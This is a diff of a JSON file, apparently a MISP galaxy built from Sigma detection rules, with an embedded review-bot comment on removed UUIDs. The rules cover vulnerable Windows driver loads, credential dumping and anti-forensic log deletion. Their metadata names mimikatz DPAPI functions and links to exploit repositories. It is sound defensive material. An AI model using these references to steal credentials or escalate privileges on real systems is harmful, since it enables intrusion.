- "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780",
- "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/",
- "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1543.003"
- ]
- },
- "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8",
- "value": "Vulnerable Driver Load"
- },
- {
- "description": "Detects the load of known vulnerable drivers via their names only.",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/10/03",
- "falsepositive": [
- "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.",
- "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)"
- ],
- "filename": "driver_load_vuln_drivers_names.yml",
- "level": "medium",
- "logsource.category": "driver_load",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules",
- "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
- "https://github.com/jbaines-r7/dellicious",
- "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md",
- "https://github.com/namazso/physmem_drivers",
- "https://github.com/stong/CVE-2020-15368",
- "https://github.com/CaledoniaProject/drivers-binaries",
- "https://github.com/Chigusa0w0/AsusDriversPrivEscala",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://eclypsium.com/2019/11/12/mother-of-all-drivers/",
- "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1543.003"
- ]
- },
- "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787",
- "value": "Vulnerable Driver Load By Name"
- },
 {
 "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation",
 "meta": {
@@ -21532,17 +22825,17 @@
 "falsepositive": [
 "Unknown"
 ],
- "filename": "driver_load_vuln_gigabyte_driver.yml",
+ "filename": "driver_load_win_vuln_gigabyte_driver.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
- "https://twitter.com/malmoeb/status/1551449425842786306",
- "https://github.com/fengjixuchui/gdrv-loader",
 "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details",
 "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml"
+ "https://twitter.com/malmoeb/status/1551449425842786306",
+ "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
+ "https://github.com/fengjixuchui/gdrv-loader",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml"
 ],
 "tags": [
 "attack.privilege_escalation",
@@ -21560,13 +22853,13 @@
 "falsepositive": [
 "Unlikely"
 ],
- "filename": "driver_load_vuln_hevd_driver.yml",
+ "filename": "driver_load_win_vuln_hevd_driver.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
 "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml"
 ],
 "tags": [
 "attack.privilege_escalation",
@@ -21577,55 +22870,65 @@
 "value": "Vulnerable HackSys Extreme Vulnerable Driver Load"
 },
 {
- "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation",
+ "description": "Detects the load of known vulnerable drivers via their names only.",
 "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/07/26",
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/03",
+ "falsepositive": [
+ "False positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.",
+ "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)"
+ ],
+ "filename": "driver_load_win_vuln_drivers_names.yml",
+ "level": "medium",
+ "logsource.category": "driver_load",
+ "logsource.product": "windows",
+ "refs": [
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969",
+ "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md",
+ "https://github.com/Chigusa0w0/AsusDriversPrivEscala",
+ "https://github.com/CaledoniaProject/drivers-binaries",
+ "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
+ "https://github.com/namazso/physmem_drivers",
+ "https://github.com/jbaines-r7/dellicious",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
+ "https://eclypsium.com/2019/11/12/mother-of-all-drivers/",
+ "https://github.com/stong/CVE-2020-15368",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules",
+ "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1543.003",
+ "attack.t1068"
+ ]
+ },
+ "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787",
+ "value": "Vulnerable Driver Load By Name"
+ },
+ {
+ "description": "Detects powershell script installed as a Service",
+ "meta": {
+ "author": "oscd.community, Natalia Shornikova",
+ "creation_date": "2020/10/06",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "driver_load_vuln_hw_driver.yml",
+ "filename": "driver_load_win_powershell_script_installed_as_service.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
- "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/",
- "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml"
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_powershell_script_installed_as_service.yml"
 ],
 "tags": [
- "attack.privilege_escalation",
- "attack.t1543.003"
+ "attack.execution",
+ "attack.t1569.002"
 ]
 },
- "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41",
- "value": "Vulnerable HW Driver Load"
- },
- {
- "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/11/10",
- "falsepositive": [
- "Legitimate driver loads (old driver that didn't receive an update)"
- ],
- "filename": "driver_load_vuln_lenovo_driver.yml",
- "level": "high",
- "logsource.category": "driver_load",
- "logsource.product": "windows",
- "refs": [
- 
"https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities",
- "https://github.com/alfarom256/CVE-2022-3699/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "cve.2021.21551",
- "attack.t1543"
- ]
- },
- "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4",
- "value": "Vulnerable Lenovo Driver Load"
+ "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073",
+ "value": "PowerShell Scripts Run by a Services"
 },
 {
 "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation",
@@ -21635,14 +22938,14 @@
 "falsepositive": [
 "Unknown"
 ],
- "filename": "driver_load_vuln_winring0_driver.yml",
+ "filename": "driver_load_win_vuln_winring0_driver.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
 "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0",
 "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml"
 ],
 "tags": [
 "attack.privilege_escalation",
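Review bot: The cluster entries "Vulnerable HW Driver Load" (uuid 9bacc538-d1b9-4d42-862e-469eafc05a41) and "Vulnerable Lenovo Driver Load" (uuid ac683a42-877b-4ff8-91ac-69e94b0f70b4) are removed in this hunk and, at least within the hunks visible here, nothing re-adds them; if they are not re-inserted elsewhere in the patch, any MISP tag or galaxy relationship that references those UUIDs stops resolving, so either keep the entries or state the upstream rule removal in the commit description. Most of the churn in this and the -21424 hunk is entries changing position rather than content (the "Vulnerable Driver Load By Name" entry, uuid c316eac1-f3d8-42da-ad1c-66dcec5ca787, is deleted there and re-added here unchanged apart from the added `"attack.t1068"` tag), which suggests the generator does not serialise `values` in a stable order; sorting entries by `uuid` or `value` before writing the file would keep future regenerations reviewable. The replacement `falsepositive` text refers to "the vulnerable driver names mentioned above", which has no antecedent once only the rule metadata, not its detection body, is imported into the galaxy; a short note in the galaxy description that `meta` fields are copied verbatim from the Sigma rule would avoid the confusion.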
@@ -21660,14 +22963,14 @@
 "falsepositive": [
 "Legitimate WinDivert driver usage"
 ],
- "filename": "driver_load_windivert.yml",
+ "filename": "driver_load_win_windivert.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
- "https://reqrypt.org/windivert-doc.html",
 "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml"
+ "https://reqrypt.org/windivert-doc.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml"
 ],
 "tags": [
 "attack.collection",
@@ -21680,477 +22983,1245 @@ "value": "WinDivert Driver Load" }, { - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "meta": { - "author": "frack113", - "creation_date": "2022/04/09", - "falsepositive": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "filename": "file_access_win_browser_credential_stealing.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", - "https://github.com/lclevy/firepwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ] - }, - "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "value": "Browser Credential Store Access" - }, - { - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "description": "Detects the load of known vulnerable drivers by hash value", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/11", - "falsepositive": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." 
- ], - "filename": "file_access_win_credential_manager_stealing.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ] - }, - "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", - "value": "Credential Manager Access" - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", + "creation_date": "2022/08/18", "falsepositive": [ "Unknown" ], - "filename": "file_access_win_dpapi_master_key_access.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ] - }, - "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", - "value": "Suspicious Access To Windows DPAPI Master Keys" - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "file_access_win_susp_cred_hist_access.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ] - }, - "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "value": "Suspicious Access To Windows Credential History File" - }, - { - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/12", - "falsepositive": [ - "Changes made to or by the local NTP service" - ], - "filename": "file_change_win_2022_timestomping.yml", + "filename": "driver_load_win_vuln_drivers.yml", "level": "high", - "logsource.category": "file_change", + "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + 
"https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/stong/CVE-2020-15368", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ - "attack.t1070.006", - "attack.defense_evasion" - ] - }, - "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "value": "File Creation Date Changed to Another Year" - }, - { - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml", - "level": "high", - "logsource.category": "file_change", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "value": "Unusual File Modification by dns.exe" - }, - { - "description": "Detect DLL deletions from Spooler Service driver folder", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1543.003", + "attack.t1068" ] }, - "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "value": "Windows Spooler Service Suspicious File Deletion" + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load" }, { - "description": "Deletion of log files is a known anti-forensic technique", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "meta": { - "author": "frack113", - "creation_date": "2022/01/16", + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "filename": "driver_load_win_vuln_dell_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" + ] + }, + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "driver_load_win_mal_creddumper.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution" + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/16", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "filename": "driver_load_win_process_hacker.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load" + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", "falsepositive": [ "Unknown" ], - "filename": "file_delete_win_delete_appli_log.yml", + "filename": "driver_load_win_vuln_hw_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load" + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "filename": "driver_load_win_vuln_lenovo_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load" + }, + { + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "filename": "net_connection_win_powershell_network_connection.yml", "level": "low", - "logsource.category": "file_delete", + "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", - "value": "Delete Log from Application" + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections" }, { - "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "description": "Detects an executable in the Windows folder accessing github.com", + "meta": { + "author": "Michael Haag (idea), Florian Roth (rule)", + "creation_date": "2017/08/24", + "falsepositive": 
[ + "Unknown", + "@subTee in your network" + ], + "filename": "net_connection_win_binary_github_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", - "creation_date": "2022/01/02", + "creation_date": "2021/12/10", "falsepositive": [ - "Legitime usage" + "Legitimate python script" ], - "filename": "file_delete_win_delete_backup_file.yml", + "filename": "net_connection_win_python.yml", "level": "medium", - "logsource.category": "file_delete", + "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", - "value": "Deletes Backup Files" - }, - { - "description": "Detects the deletion of a prefetch file (AntiForensic)", - "meta": { - "author": "Cedric MAURUGEON", - "creation_date": 
"2021/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_delete_prefetch.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "value": "Prefetch File Deletion" - }, - { - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Possible FP during log rotation" - ], - "filename": "file_delete_win_exchange_powershell_logs.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "value": "Exchange PowerShell Cmdlet History Deleted" - }, - { - "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. 
It looks for the common name pattern used to rename files.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Legitime usage of SDelete" - ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", - "level": "medium", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "value": "Sysinternals SDelete File Deletion" - }, - { - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "value": "Unusual File Deletion by dns.exe" - }, - { - "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/16", - "falsepositive": [ - 
